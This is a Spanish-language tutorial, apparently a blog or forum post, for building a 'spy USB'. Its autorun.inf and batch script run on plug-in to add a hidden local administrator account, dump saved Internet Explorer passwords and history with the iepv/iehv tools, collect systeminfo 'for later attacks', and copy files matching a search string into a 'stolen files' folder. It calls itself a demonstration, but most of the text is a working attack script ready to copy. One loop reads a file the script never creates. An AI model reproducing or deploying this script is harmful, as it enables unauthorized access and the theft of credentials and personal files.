Crea tu usb espía

Concepto:

Crear una usb con motivos demostrativos sobre lo fácil que es usar este medio con fines peligrosos

Crearemos una usb que al momento de conectarse al USB realiza las siguientes acciones:

1 - Crea un usuario administrador
2 - Escribe archivos en la máquina destino
3 - Copia información del sistema para ataques posteriores
4 - Copia archivos al USB
5 - Roba contraseñas guardadas de IEXPLORER e historial




Que necesitamos:

Memoria USB
Descargar el sw iepv y el iehv y descomprimir el contenido en la raiz de la USB

El método que usaremos no usa sw especializado, ya que casi siempre estas herramientas son detectadas por los antivirus actualizados. Lo que haremos es "a patín", es decir crearemos archivos bat que llamarán diferentes rutinas que harán las fechorías

Manos a la obra

Lo primero es crear un archivo autorun.inf en la raiz de la usb, mismo que será quien inicie automáticamente el archivo bat que crearemos al conectar la memoria
* NOTA: el windows puede estar configurado para no correr autorun cuando algo se conecta, pero casis siempre es lo contrario

Para crear el autorun abrimos un notepad y escribimos:
[autorun]
open=usbproject.bat

Ahora guardamos el archivo como autorun.inf
*recuerden que al darle save as hay que seleccionar donde dice "all files", de lo contrario lo guarda como autorun.inf.txt

Creamos una carpeta llamada archivosrobados

Ahora abrimos notepad y ponemos el siguiente código (los campos en mayúscula pueden ser cambiados)


@echo off

net user USERNAME PASSWORD /add

net localgroup administrators USERNAME /ADD

mkdir c:\DIRECTORIO

echo "TEXTO QUE QUEREMOS ESCRIBIR EN EL WARNING" > c:\DIRECTORIO\NOMBREARCHIVO.txt

start iepv.exe /sverhtml NOMBREOUTPUT.html

start iehv.exe /sverhtml NOMBREOUTPUT2.html

systeminfo > NOMBREOUTPUT3.txt

dir d:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (NOMBREOUTPUT4.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

dir c:\ /s /b | find "STRINGDEBUSQUEDA" >NOMBREOUTPUT4.txt

setLocal EnableDelayedExpansion

for /f "tokens=* delims= " %%a in (zoutput.txt) do (
set /a n+=1
set v!n!=%%a

copy "%%a" "%CD%\archivosrobados"

)
set v

exit

ahora guardamos el archivo como usbproject.bat

Y listo, hemos terminado.

No olviden después de correr la herramienta eliminar al usuario creado, etc etc

Happy usbing

Material extra
Explicación para configurar el código

USERNAME: nombre del usuario que crearán
PASSWORD: Password que asignarán a dicho usuario
DIRECTORIO: ruta donde depositarán un archivo falso para demostrar que es posible hacerlo
NOMBREOUTPUT: nombre del archivo que contendrá contraseñas de IEXPLORER
NOMBREOUTPUT2: nombre del archivo que contendrá el historial
NOMBREOUTPUT3: nombre del archivo que contendrá información del sistema
NOMBREOUTPUT4: nombre del archivo temporal donde se guardan los archivos a copiar